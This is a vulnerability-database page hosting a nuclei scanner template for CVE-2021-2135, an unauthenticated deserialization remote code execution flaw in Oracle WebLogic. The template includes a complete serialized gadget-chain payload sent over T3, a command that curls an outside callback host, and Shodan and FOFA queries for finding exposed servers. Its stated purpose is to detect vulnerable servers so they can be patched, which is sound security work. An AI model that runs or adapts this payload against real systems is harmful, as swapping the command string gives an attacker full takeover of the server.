Lucene search
K

Oracle WebLogic Server - Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Oracle WebLogic Server remote code execution via unauthenticated T3/IIOP access enables full takeover; network access required.

Related
Refs
Code
id: CVE-2021-2135

info:
  name: Oracle WebLogic Server - Remote Code Execution
  author: hnd3884
  severity: critical
  description: |
    Oracle WebLogic Server (12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0) contains a remote code execution caused by unauthenticated access via T3, IIOP, letting attackers take over the server, exploit requires network access.
  impact: |
    Attackers can fully compromise the server, leading to data breach, service disruption, and potential further exploitation.
  remediation: |
    Update to the latest patched version of Oracle WebLogic Server.
  reference:
    - https://www.oracle.com/security-alerts/cpuapr2021.html
    - https://x-f1v3.github.io/blog/1626153074926.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-2135
    epss-score: 0.0837
    epss-percentile: 0.94288
    cwe-id: CWE-502
    cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - cpe:"cpe:2.3:a:oracle:weblogic_server"
      - product:"WebLogic"
      - http.server:"WebLogic"
      - port:7001
    fofa-query: product="WebLogic" || header="WebLogic Server"
  tags: cve,cve2021,weblogic,oracle,rce,vkev

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const net = require('nuclei/net');
      const address = Host + ":" + Port;
      const CMD_LINUX = "curl http://rce-linux-host." + oast;
      const CMD_WIN = "cmd.exe /c powershell curl http://rce-window-host." + oast;

      function decimalToFixedBytes(num, byteLength = 2) {
          const arr = new Uint8Array(byteLength);
          for (let i = byteLength - 1; i >= 0; i--) {
              arr[i] = num & 0xFF;
              num = num >> 8;
          }
          return arr;
      }

      function buildLengthHex(hexStr, cmdLinux) {
          var num = parseInt(hexStr, 16);
          var value = num + cmdLinux.length - 19;
          var buf = bytes.Buffer();
          buf.Write(decimalToFixedBytes(value));
          return buf.Hex();
      }

      function buildLengthHex2(hexStr, cmdLinux) {
          var num = parseInt(hexStr, 16);
          var value = num + cmdLinux.length - 90;
          var buf = bytes.Buffer();
          buf.Write(decimalToFixedBytes(value));
          return buf.Hex();
      }

      function stringToHex(str) {
          var buf = bytes.Buffer();
          buf.WriteString(str);
          return buf.Hex();
      }

      function sendExploit(payload) {
          s1 = net.Open('tcp', address);
          s1.SendHex("743320372e302e302e300a41533a31300a484c3a31390a0a");
          s1.Recv(4096);
          s1.SendHex(payload);
      }

      sample = "00000486086501ffffffffffffffff00000000041000aced00057372002e636f6d2e74616e676f736f6c2e636f686572656e63652e736572766c65742e417474726962757465486f6c646572cc30a4783def6ac10c000078707a0000016f400a2d636f6d2e74616e676f736f6c2e7574696c2e70726f636573736f722e436f6e646974696f6e616c507574416c6c0a27636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4d61704576656e7446696c7465720000000000020a2c636f6d2e74616e676f736f6c2e696e7465726e616c2e7574696c2e53696d706c6542696e617279456e74727907000000d30a39636f6d2e74616e676f736f6c2e7574696c2e61676772656761746f722e546f704e41676772656761746f72245061727469616c526573756c740a38636f6d2e74616e676f736f6c2e636f686572656e63652e726573742e7574696c2e657874726163746f722e4d76656c457874726163746f720000000091016a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632822636d642e657865202f632063616c632e65786522293b72657475726e206e657720496e74656765722831293b020000000101010700000002010001010b73720031636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e6f626a656374732e58537472696e671c0a273b4816c5fd02000078720031636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e6f626a656374732e584f626a656374f4981209bb7bb6190200014c00056d5f6f626a7400124c6a6176612f6c616e672f4f626a6563743b7872002c636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e45787072657373696f6e07d9a61c8dacacd60200014c00086d5f706172656e747400324c636f6d2f73756e2f6f72672f6170616368652f78706174682f696e7465726e616c2f45787072657373696f6e4e6f64653b7870707077050102000000781000aced0005737200307765626c6f6769632e73656375726974792e61636c2e696e7465726e616c2e41757468656e74696361746564557365725cf8e9684f73eb7b0200074900096c6f63616c506f7274420003716f734a000974696d655374616d704c000b696e6574416464726573737400164c6a6176612f6e65742f496e6574416464726573733b4c000c6c6f63616c4164647265737371007e00014c00046e616d657400124c6a6176612f6c616e672f537472696e673b5b00097369676e61747572657400025b427870ffffffff650000019af1762bd070707400087765626c6f676963757200025b42acf317f8060854e0020000787000000010fef0048c9180baa747c69effdef421f41000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771c01000000000000000100093132372e302e302e3183b5795200000000781000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707711000000000000000001000000000000000078";

      // payload
      payload_linux = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_LINUX)).replace('0486', buildLengthHex('0486', CMD_LINUX)).replace('016f', buildLengthHex('016f', CMD_LINUX)).replace('00d3', buildLengthHex('00d3', CMD_LINUX)).replace('0091', buildLengthHex('0091', CMD_LINUX));
      payload_win = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_WIN)).replace('0486', buildLengthHex('0486', CMD_WIN)).replace('016f', buildLengthHex('016f', CMD_WIN)).replace('00d3', buildLengthHex('00d3', CMD_WIN)).replace('009101', buildLengthHex2('0098', CMD_WIN) + '02');

      // send exploit
      sendExploit(payload_linux)
      sendExploit(payload_win)

    args:
      Host: "{{Host}}"
      Port: "7001"
      oast: "{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'

      - type: word
        part: interactsh_request
        words:
          - "rce-linux"
          - "rce-window"
        condition: or

    extractors:
      - type: regex
        part: interactsh_request
        regex:
          - 'rce-(linux|window)[^\s]*'
# digest: 4a0a00473045022100fdb090e912d14163c6acb368ceb5c07ed2947d2048d92b9080a047ab45f0161f02206b5931d4e02f4a9fb42a83776266bc2bccfbc252ff46dd935c8ef5a2b5620851:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
CVSS 3.19.8
EPSS0.0837
SSVC
32